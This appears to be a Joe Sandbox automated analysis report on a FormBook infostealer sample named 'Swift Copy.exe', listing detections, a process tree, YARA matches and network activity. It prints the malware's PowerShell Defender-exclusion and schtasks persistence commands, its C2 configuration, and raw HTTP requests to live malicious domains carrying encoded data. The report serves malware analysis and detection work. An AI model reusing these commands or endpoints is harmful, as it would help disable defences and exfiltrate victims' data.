Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Swift Copy.exe

Overview

General Information

Sample Name:Swift Copy.exe
Analysis ID:682145
MD5:50d4fb3f5a33007c2f80e5bbaa5e0ccd
SHA1:26ff500d90184b5e7928cb16e92bbe0e4553e95e
SHA256:0bacce1f09d476c0b84cd699b50152a74dd6bfd2a052749d7b5a3f4a4ae7b7d9
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Swift Copy.exe (PID: 1740 cmdline: "C:\Users\user\Desktop\Swift Copy.exe" MD5: 50D4FB3F5A33007C2F80E5BBAA5E0CCD)
    • powershell.exe (PID: 2300 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 2292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 5924 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ImUIYlbLTIh" /XML "C:\Users\user\AppData\Local\Temp\tmpE16E.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 1164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegSvcs.exe (PID: 4200 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autofmt.exe (PID: 1164 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • NETSTAT.EXE (PID: 5496 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.my1245.com/bwe0/"], "decoy": ["GA8abA96SLI=", "RjM/QAsrNyRPlNEjahNMdKXlPtbXpQ==", "rOQ4ySihIKVFhRnhZxfZ", "iSnyAlGXQBSBwz1C", "SYfcQ54ijGWAuQq1UQTE", "XRcVgsQIO8FVnvCOiHLvE3k=", "K2XLULRJuod6I3dO", "S4oH5i5i3+expw==", "4hZdto3RgCY9esve1k7T5x9YPw==", "fkpgXDuEv2NzvxCcq2AxMnE=", "13czFGvtsco1gf8=", "ub4KhXCsZ/qnnvYTijN3dA==", "WD5IRIcJB51Hfs8grBnldA==", "YqxA1LPudXGKyP1FlQ==", "MZHXMBdZ8Mf2X3ZjSVY=", "7mLLNhchknqdLVbz+6ci4VeD", "66OK6kmRv8N6I3dO", "+97y8jK5vTnIn8crIwyHnRxv03Kp", "PC1PqPJ6573fH0aUnGAxMnE=", "3BFlt4nJcA3Inb3TGO02bq++XzWRMVg=", "JFWj7LK++b1oRUtG", "TbxQMHrFdPd6I3dO", "ltV+Zbop3H8ufAGhzN3O", "mlcxPKADy6TjUdNgnWAxMnE=", "GZlnUCk98Q0sfdIykw==", "ejIKCEuKTCdRrCmEik4Llxxv03Kp", "oBioj+xiThlFleT8Sb2OU6jyDjWRMVg=", "FTiMDEy9JumdFnxiig==", "3F/6yw1VGOkbfvl+wLtBZ+YotQlBMKb8sw==", "gP2ZcmKh5co1gf8=", "QB0tm/t82o5NJ0/hZxfZ", "7p+eEFywCuQDNXv6UOqfYw==", "VT09fVZax5pZOWDL1JH64Ima", "6y+iWKUy3+expw==", "QsByZl2v6YY/IF87hDWDmRtv03Kp", "FMSC3UQG3+expw==", "4iZslO0xz0vUntnn/fX2k6bkRPCE3nhQsQ==", "QALQo+6BigCVFnxiig==", "tGEvL4wVB82JcsmhzN3O", "C3MpKHrHh0hV4B2p4dR3dQ==", "+jBbwhmM9K3ABEXhZxfZ", "Bgtm5ypqp4F6I3dO", "gjAL+kjz7sphJ0zhZxfZ", "XdWUftmHvYF6I3dO", "/72t+jNqjjDTEV4tbVg=", "DogcC2/11HdGqv2BEuHA", "XgwEGD8FXWErZmlI", "i0Ud7r7Ot39AkQrk3Y1frfEsNw==", "ldkwfVSeU9dkhpeknQ==", "Do9QPSpsaYJ6I3dO", "lJCssH2SnGLkU+Y=", "993QLp0nk1yDgZd1rBnldA==", "k8cWkuts5VMbaZ9quHj64Ima", "bF53yjBwIg9H", "BYcZjHa7hWAyFzAQMyg616PYPtbXpQ==", "XFSfGGr2bDP/ebB8x3Izrh5v03Kp", "A8PhVrAswln64jlMWGnQ9pXThRZ8HLyi", "yL3yWzZCyVcmpCbw7q+FFPkIFzWRMVg=", "P8yKVC56enmwYp+HpaPR", "OvT4bdZHwkTRntehzN3O", "re6GEPc19FobfNUkrBnldA==", "3JOU+kudyloQ/zcBR2FgrfEsNw==", "B/cOgMQIHPYjkynCGiG5xbYaGwQ=", "XqQpFlRw8m4bXJt0uZZ12SVNPw=="]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x6601:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1d750:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa92f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x16b57:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x16955:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x16401:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x16a57:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x16bcf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa4fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1564c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb242:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1c3a7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1d4ba:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18e19:$sqlite3step: 68 34 1C 7B E1
    • 0x18f4c:$sqlite3step: 68 34 1C 7B E1
    • 0x18e5b:$sqlite3text: 68 38 2A 90 C5
    • 0x18fa3:$sqlite3text: 68 38 2A 90 C5
    • 0x18e72:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18fc5:$sqlite3blob: 68 53 D8 7F 8C
    0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 29 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      8.0.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        8.0.RegSvcs.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x5801:$a1: 3C 30 50 4F 53 54 74 09 40
        • 0x1c950:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x9b2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x15d57:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        8.0.RegSvcs.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x15b55:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15601:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15c57:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x15dcf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x96fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1484c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa442:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b5a7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c6ba:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        8.0.RegSvcs.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18019:$sqlite3step: 68 34 1C 7B E1
        • 0x1814c:$sqlite3step: 68 34 1C 7B E1
        • 0x1805b:$sqlite3text: 68 38 2A 90 C5
        • 0x181a3:$sqlite3text: 68 38 2A 90 C5
        • 0x18072:$sqlite3blob: 68 53 D8 7F 8C
        • 0x181c5:$sqlite3blob: 68 53 D8 7F 8C
        0.2.Swift Copy.exe.34c7188.6.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          Click to see the 3 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: Swift Copy.exeVirustotal: Detection: 21%Perma Link
          Source: Swift Copy.exeReversingLabs: Detection: 19%
          Yara detected FormBook
          Source: Yara matchFile source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.epic45.co.uk/bwe0/?9rV8zl=21tjbkChbFWznsu0s5dQgMCLDQHTp3tJL/2kMDFZYsfdSZfl+tTwQu/FIpmHzzlEQrwumqO36HFfwo3EfD1Crt0mHKlMwrNEfw==&YN9=w6PTp6pp-Zfte2a0Avira URL Cloud: Label: malware
          Source: http://www.kinemartigues.com/bwe0/Avira URL Cloud: Label: malware
          Source: http://www.epic45.co.uk/bwe0/Avira URL Cloud: Label: malware
          Source: www.my1245.com/bwe0/Avira URL Cloud: Label: malware
          Source: http://www.mogdento.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9+phILUgzUwHPh2LCdIS8sbnczPqTtIgth+oM8i1bVTrz46wPYQwCayAKWOCT9dODOCAwfo9QBDVHWgp/MlMRCDLLRs2he6w==Avira URL Cloud: Label: malware
          Source: http://mogdento.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9Avira URL Cloud: Label: malware
          Source: http://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB+LrmWtJBQqMyCe4o1I9YkrzlNkt4Y5lQSVrtsHmDN4rDqK6jdbIqfImlF05yj9AnCTnfqfBJ/tqveG/rYA7nf00SA==Avira URL Cloud: Label: malware
          Source: http://www.mogdento.com/bwe0/Avira URL Cloud: Label: malware
          Source: http://www.blackyaga.xyz/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=sE+e17jc53oiMc/tXTBrdM81Jmo39pRVgGsWsNeg2yHBZP8DMvAafxUSa5mU59eBVMhEqwjNcWZP/MmjQeTg8VWUgAq2ah5qoA==Avira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exeReversingLabs: Detection: 19%
          Source: 8.0.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.my1245.com/bwe0/"], "decoy": ["GA8abA96SLI=", "RjM/QAsrNyRPlNEjahNMdKXlPtbXpQ==", "rOQ4ySihIKVFhRnhZxfZ", "iSnyAlGXQBSBwz1C", "SYfcQ54ijGWAuQq1UQTE", "XRcVgsQIO8FVnvCOiHLvE3k=", "K2XLULRJuod6I3dO", "S4oH5i5i3+expw==", "4hZdto3RgCY9esve1k7T5x9YPw==", "fkpgXDuEv2NzvxCcq2AxMnE=", "13czFGvtsco1gf8=", "ub4KhXCsZ/qnnvYTijN3dA==", "WD5IRIcJB51Hfs8grBnldA==", "YqxA1LPudXGKyP1FlQ==", "MZHXMBdZ8Mf2X3ZjSVY=", "7mLLNhchknqdLVbz+6ci4VeD", "66OK6kmRv8N6I3dO", "+97y8jK5vTnIn8crIwyHnRxv03Kp", "PC1PqPJ6573fH0aUnGAxMnE=", "3BFlt4nJcA3Inb3TGO02bq++XzWRMVg=", "JFWj7LK++b1oRUtG", "TbxQMHrFdPd6I3dO", "ltV+Zbop3H8ufAGhzN3O", "mlcxPKADy6TjUdNgnWAxMnE=", "GZlnUCk98Q0sfdIykw==", "ejIKCEuKTCdRrCmEik4Llxxv03Kp", "oBioj+xiThlFleT8Sb2OU6jyDjWRMVg=", "FTiMDEy9JumdFnxiig==", "3F/6yw1VGOkbfvl+wLtBZ+YotQlBMKb8sw==", "gP2ZcmKh5co1gf8=", "QB0tm/t82o5NJ0/hZxfZ", "7p+eEFywCuQDNXv6UOqfYw==", "VT09fVZax5pZOWDL1JH64Ima", "6y+iWKUy3+expw==", "QsByZl2v6YY/IF87hDWDmRtv03Kp", "FMSC3UQG3+expw==", "4iZslO0xz0vUntnn/fX2k6bkRPCE3nhQsQ==", "QALQo+6BigCVFnxiig==", "tGEvL4wVB82JcsmhzN3O", "C3MpKHrHh0hV4B2p4dR3dQ==", "+jBbwhmM9K3ABEXhZxfZ", "Bgtm5ypqp4F6I3dO", "gjAL+kjz7sphJ0zhZxfZ", "XdWUftmHvYF6I3dO", "/72t+jNqjjDTEV4tbVg=", "DogcC2/11HdGqv2BEuHA", "XgwEGD8FXWErZmlI", "i0Ud7r7Ot39AkQrk3Y1frfEsNw==", "ldkwfVSeU9dkhpeknQ==", "Do9QPSpsaYJ6I3dO", "lJCssH2SnGLkU+Y=", "993QLp0nk1yDgZd1rBnldA==", "k8cWkuts5VMbaZ9quHj64Ima", "bF53yjBwIg9H", "BYcZjHa7hWAyFzAQMyg616PYPtbXpQ==", "XFSfGGr2bDP/ebB8x3Izrh5v03Kp", "A8PhVrAswln64jlMWGnQ9pXThRZ8HLyi", "yL3yWzZCyVcmpCbw7q+FFPkIFzWRMVg=", "P8yKVC56enmwYp+HpaPR", "OvT4bdZHwkTRntehzN3O", "re6GEPc19FobfNUkrBnldA==", "3JOU+kudyloQ/zcBR2FgrfEsNw==", "B/cOgMQIHPYjkynCGiG5xbYaGwQ=", "XqQpFlRw8m4bXJt0uZZ12SVNPw=="]}
          Source: Swift Copy.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: Swift Copy.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: RegSvcs.pdb, source: NETSTAT.EXE, 00000019.00000002.518155869.0000000003263000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.282733193.0000000001701000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.279929661.0000000001565000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.513858373.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.357141735.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.359401565.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.516489080.000000000303F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.282733193.0000000001701000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.279929661.0000000001565000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.513858373.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.357141735.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.359401565.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.516489080.000000000303F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: RegSvcs.pdb source: NETSTAT.EXE, 00000019.00000002.518155869.0000000003263000.00000004.10000000.00040000.00000000.sdmp

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 103.92.235.55 80
          Source: C:\Windows\explorer.exeDomain query: www.mogdento.com
          Source: C:\Windows\explorer.exeNetwork Connect: 103.67.235.120 80
          Source: C:\Windows\explorer.exeNetwork Connect: 192.3.130.2 80
          Source: C:\Windows\explorer.exeNetwork Connect: 85.159.66.93 80
          Source: C:\Windows\explorer.exeDomain query: www.kinemartigues.com
          Source: C:\Windows\explorer.exeNetwork Connect: 51.159.175.169 80
          Source: C:\Windows\explorer.exeDomain query: www.blackyaga.xyz
          Source: C:\Windows\explorer.exeDomain query: www.epic45.co.uk
          Source: C:\Windows\explorer.exeDomain query: www.expectedclosure.one
          Uses netstat to query active network connections and open ports
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exeDNS query: www.blackyaga.xyz
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.my1245.com/bwe0/
          Source: Joe Sandbox ViewASN Name: ZINIOSS-AS-INZiniosInformationTechnologyPvtLtdIN ZINIOSS-AS-INZiniosInformationTechnologyPvtLtdIN
          Source: Joe Sandbox ViewASN Name: DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU
          Source: global trafficHTTP traffic detected: GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=sE+e17jc53oiMc/tXTBrdM81Jmo39pRVgGsWsNeg2yHBZP8DMvAafxUSa5mU59eBVMhEqwjNcWZP/MmjQeTg8VWUgAq2ah5qoA== HTTP/1.1Host: www.blackyaga.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bwe0/?9rV8zl=z0a7bU3Grk9SZV+rn0o4us/noU2vzWsLY51yg1R10n5VTVON6q0J/IdVbRNrmdil3H/zWNK1GQbVnCycFh7AKivH+ief+xiP+g==&YN9=w6PTp6pp-Zfte2a0 HTTP/1.1Host: www.expectedclosure.oneConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB+LrmWtJBQqMyCe4o1I9YkrzlNkt4Y5lQSVrtsHmDN4rDqK6jdbIqfImlF05yj9AnCTnfqfBJ/tqveG/rYA7nf00SA== HTTP/1.1Host: www.kinemartigues.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bwe0/?9rV8zl=21tjbkChbFWznsu0s5dQgMCLDQHTp3tJL/2kMDFZYsfdSZfl+tTwQu/FIpmHzzlEQrwumqO36HFfwo3EfD1Crt0mHKlMwrNEfw==&YN9=w6PTp6pp-Zfte2a0 HTTP/1.1Host: www.epic45.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9+phILUgzUwHPh2LCdIS8sbnczPqTtIgth+oM8i1bVTrz46wPYQwCayAKWOCT9dODOCAwfo9QBDVHWgp/MlMRCDLLRs2he6w== HTTP/1.1Host: www.mogdento.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 103.67.235.120 103.67.235.120
          Source: global trafficHTTP traffic detected: POST /bwe0/ HTTP/1.1Host: www.expectedclosure.oneConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.expectedclosure.oneUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.expectedclosure.one/bwe0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 39 72 56 38 7a 6c 3d 7e 32 79 62 59 68 7a 7a 38 51 68 46 58 58 28 4a 67 53 55 6c 6f 2d 48 71 71 46 7a 32 35 55 73 73 50 4a 64 6e 6e 78 4e 52 75 45 56 76 44 41 36 6b 34 49 41 4c 69 64 64 7a 56 52 38 2d 71 61 6e 6a 7a 56 6a 6b 45 76 48 4f 4f 33 6e 49 77 43 79 55 49 42 75 61 44 77 50 31 32 7a 6e 6b 36 69 36 48 34 61 32 52 46 74 70 30 57 46 4f 6a 66 66 79 38 4e 53 70 53 77 79 64 5a 78 55 45 34 31 57 42 39 66 32 47 33 42 79 62 33 7a 6d 34 42 33 63 52 46 44 43 6b 48 6c 38 4d 34 6e 4e 4b 53 39 78 66 6a 30 62 37 4b 4c 50 55 75 75 4a 30 57 41 4e 30 61 6c 6d 38 57 52 63 34 63 77 46 6d 5f 4e 4b 44 32 71 70 59 38 49 37 78 39 28 46 57 30 36 66 63 68 74 42 71 6c 7e 33 49 38 75 6c 52 41 63 31 36 4d 45 6c 76 75 66 4a 68 31 5a 49 62 55 6a 33 6c 36 41 2d 33 6f 33 6c 4b 43 78 41 41 58 33 57 32 33 34 74 48 6a 42 4f 28 5a 7a 38 5a 76 78 4d 51 6f 37 6a 64 59 58 2d 46 6b 54 6e 39 62 69 6f 4b 74 55 68 78 4e 45 55 31 73 66 79 33 5f 52 4d 68 4a 64 51 74 49 59 67 76 52 6c 37 54 37 67 62 69 6e 54 74 7e 38 54 2d 57 62 51 36 74 77 42 48 77 66 71 45 53 50 7a 39 70 31 4a 58 46 4e 34 37 67 33 67 68 7e 4f 47 49 4a 4b 56 42 52 67 30 6b 68 59 33 50 79 37 7e 46 6d 76 66 7a 7a 58 30 57 6b 69 46 68 6e 6c 32 53 45 67 57 71 46 39 6e 46 70 70 39 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 9rV8zl=~2ybYhzz8QhFXX(JgSUlo-HqqFz25UssPJdnnxNRuEVvDA6k4IALiddzVR8-qanjzVjkEvHOO3nIwCyUIBuaDwP12znk6i6H4a2RFtp0WFOjffy8NSpSwydZxUE41WB9f2G3Byb3zm4B3cRFDCkHl8M4nNKS9xfj0b7KLPUuuJ0WAN0alm8WRc4cwFm_NKD2qpY8I7x9(FW06fchtBql~3I8ulRAc16MElvufJh1ZIbUj3l6A-3o3lKCxAAX3W234tHjBO(Zz8ZvxMQo7jdYX-FkTn9bioKtUhxNEU1sfy3_RMhJdQtIYgvRl7T7gbinTt~8T-WbQ6twBHwfqESPz9p1JXFN47g3gh~OGIJKVBRg0khY3Py7~FmvfzzX0WkiFhnl2SEgWqF9nFpp9g).
          Source: global trafficHTTP traffic detected: POST /bwe0/ HTTP/1.1Host: www.kinemartigues.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.kinemartigues.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kinemartigues.com/bwe0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 39 72 56 38 7a 6c 3d 42 35 56 53 6a 37 71 39 4f 72 72 58 74 30 51 79 4f 33 7e 74 35 48 47 34 67 51 31 49 59 47 6a 41 6b 72 34 67 72 63 6c 73 51 54 5a 79 67 4a 6d 79 43 5a 56 7a 4f 61 65 35 6d 38 72 2d 70 4f 67 62 72 55 73 35 73 78 63 45 71 6a 7a 63 62 49 6a 59 62 75 49 6d 6f 38 36 54 73 4a 73 4e 69 73 59 4d 4d 6a 4b 71 35 66 63 31 77 49 6d 69 59 46 41 31 64 32 6c 75 59 43 73 62 4b 49 57 31 32 2d 4d 51 46 43 6f 7a 64 79 6d 4a 69 37 6e 30 65 58 79 5f 37 5f 38 6a 28 6c 75 66 35 59 31 6d 66 4e 71 6c 56 61 78 45 37 35 63 6a 33 5a 66 61 6f 33 6e 4f 43 30 50 6b 31 57 54 43 28 33 4f 55 42 64 69 65 5a 4a 55 76 4b 6a 65 44 36 41 69 53 6e 43 59 6f 28 46 70 64 39 32 50 7a 6a 7a 51 54 43 64 43 56 63 32 38 74 51 58 67 56 37 52 34 42 71 2d 4b 37 64 4a 5a 76 39 48 6b 31 39 6a 65 35 51 75 34 50 7e 58 64 54 33 56 79 47 48 33 4c 5a 57 45 6c 76 45 65 77 67 44 33 67 6c 35 42 28 73 5a 34 31 47 71 34 7e 39 30 59 6c 33 5a 37 57 51 34 4f 55 67 6b 67 4d 57 67 45 4f 37 4d 48 72 6d 34 72 4d 74 33 38 57 78 53 31 57 56 49 5a 5a 32 38 6d 74 7a 67 45 4f 4d 35 62 5a 62 28 6e 64 61 7a 59 5a 4a 56 78 4c 39 5a 6a 59 4d 4d 41 48 58 47 4b 4b 35 30 6d 37 58 54 74 61 57 63 74 7a 4a 35 52 42 57 71 6c 74 7a 6d 59 62 62 72 43 6d 74 65 62 4a 55 6b 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 